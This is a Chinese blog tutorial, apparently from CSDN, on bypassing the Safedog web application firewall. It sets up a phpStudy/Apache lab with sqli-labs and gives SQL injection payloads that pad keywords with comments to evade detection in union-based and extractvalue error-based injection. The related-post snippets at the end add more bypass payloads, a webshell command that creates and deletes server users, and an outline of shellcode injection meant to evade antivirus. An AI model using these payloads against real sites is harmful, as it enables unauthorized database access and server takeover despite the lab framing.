安全狗绕过

最新推荐文章于 2024-08-22 21:07:34 发布
最新推荐文章于 2024-08-22 21:07:34 发布
阅读量400 收藏 1
点赞数 9
文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxy158212/article/details/135668290
版权

一、环境搭建

1、下载phpstudy

2、查看服务

使用cmd输入以下命令

Services.msc

没有服务进入3步骤,有则跳过

3、创建系统服务

找到phpstudy下的apache服务:

C:\phpstudy_pro\Extensions\Apache2.4.39\bin

以管理员身份打开cmd

到达指定目录

使用命令创建

Httpd.exe -k install -n Apache2.4.39

刷新查看

4、安装安全狗

接下来使用的是sqli-labs靶场进行演示

5、测试

随便输入一个没有变形的语句,被拦截了

二、安全狗绕过

1、联合注入

①位数

按照常规写法发现被拦截了,那么我们测试一下单个字母是否拦截

可以发现,单个字母并没有拦截,那么我们尝试在组合之间加入许多注释

但并不是加了注释就可以绕过的

?id=1'order/*/*/by/**/1--+

绕过后,可以获得位数为3

②显示位

?id=1'union/*//--/*/select 1,2,3--+

③数据库名

测试发现database()被拦截了

按照上面尝试在database和()之间添加注释

?id=1'union/*//--//--/*/select 1,database/*/11111*/(),3--+

2、报错注入

这里使用extractvalue函数引发报错

测试发现extractvalue()被拦截了

按照上面尝试在extractvalue和()之间添加注释

绕过extractvalue()

绕过database()

?id=1'and extractvalue/*/676*/(1,concat(0x7e,database/*/387*/(),x07e))--+

同理进行后续操作

哈哈。。。。。。
关注
绕过安全狗
weixin_45923850的博客
07-20 1204
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1174
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
WEB渗透免杀篇-绕过
最新发布
qq_59468567的博客
08-22 675
在进程中分配空间(检索内存地址)。我们可以使用几个Win32 API执行这些步骤: OpenProcess() VirtualAllocEx() WriteProcessMemory() CreateRemoteThread() 正常情况下,我们将原始shellcode直接写入到内存中,但是如果AV /EDR检测到了Shellcode,它们肯定会发出警报 所以我们在二进制文件中使用可逆的方式把shellcode编码,再解码写入内存来规避防护。现在,我们将开始实现将为我们执行shellcode注入的C代码。
安全狗绕过
alien0011的博客
06-09 3480
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1785
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
绕过安全狗_绕过安全狗五步法
weixin_28810909的博客
12-24 720
今天分享绕过安全狗的方法,各位帽子兄弟研阅。PS:测试请断网,据说log会上传,哈哈熟悉的页面,没错绕过它,核心方法:Mysql注释绕过环境:001 利用数据回显获取用户信息找出回显字段http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)http://127.0.0.1/killdog/dog...
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5562
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux...这篇文档总结了一些安全狗上传绕过经验,供参考。
安全狗绕过策略剖析:缺陷与应对方法
绕过后的思考——安全狗的缺陷如何产生? 在IT安全领域,网站应用层防火墙(WAF,Web Application Firewall)如安全狗(一种常见的WAF产品)的主要功能是检测和阻止恶意攻击,包括SQL注入、XSS(跨站脚本攻击)等。...
ByPASS系列之安全狗
游魂的博客
12-07 938
绕过安全狗: 内联注释法:/*! */ 首先测试拦截关键字:and 1=1 被拦 内联注释测试:/*!10440and*/1=1 http://xxxx.com:8888/int.php?id=5 and 1=1 可以看到已经绕过安全狗检测,/*!数字and*/1=1,内联注释中的数字是通过模糊测试出来的。 注意:/*!数字*/ 数字小于数据库版本关键字会执行,大于数据库的版本关键字不会执行...
一次安全狗绕过
weixin_45490166的博客
07-15 271
http://115.159.97.35/sqli-labs-master/Less-1/?id=1 安全狗绕过 参考 https://www.cnblogs.com/Yang34/p/12055052.html ?id=1' order/*!99999asd*/by 3 --+ ?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
安全狗 mysql_绕过安全狗进行sql注入(MySQL
weixin_34642354的博客
01-18 540
看我如何一步步绕过安全狗前言前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗绕过。 实验环境网站安全狗v4.0apache 2.4.27php 5.6MySQL 5.7 我们需...
安全狗bypass
alert['Hello World']
07-22 376
目录sql注入xss目录扫描 sql注入 http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-1--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-2--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/order--+/
Fuzz安全狗注入绕过
p656456564545的专栏
01-03 792
  安全狗版本为: apache 4.0 网站为: php+mysql 系统: win 2003   这里只要是fuzz /*!union 跟 select*/ 之间的内容: 1 /*!union&lt;FUZZ_HERE&gt;select*/  位置很多可以选择。   脚本语言你可以用你喜欢的, 我这里用perl6   让我们一步步...
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 3831
Safedog 4.0 bypass绕过
安全狗文件绕过
weixin_30241919的博客
08-24 479
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值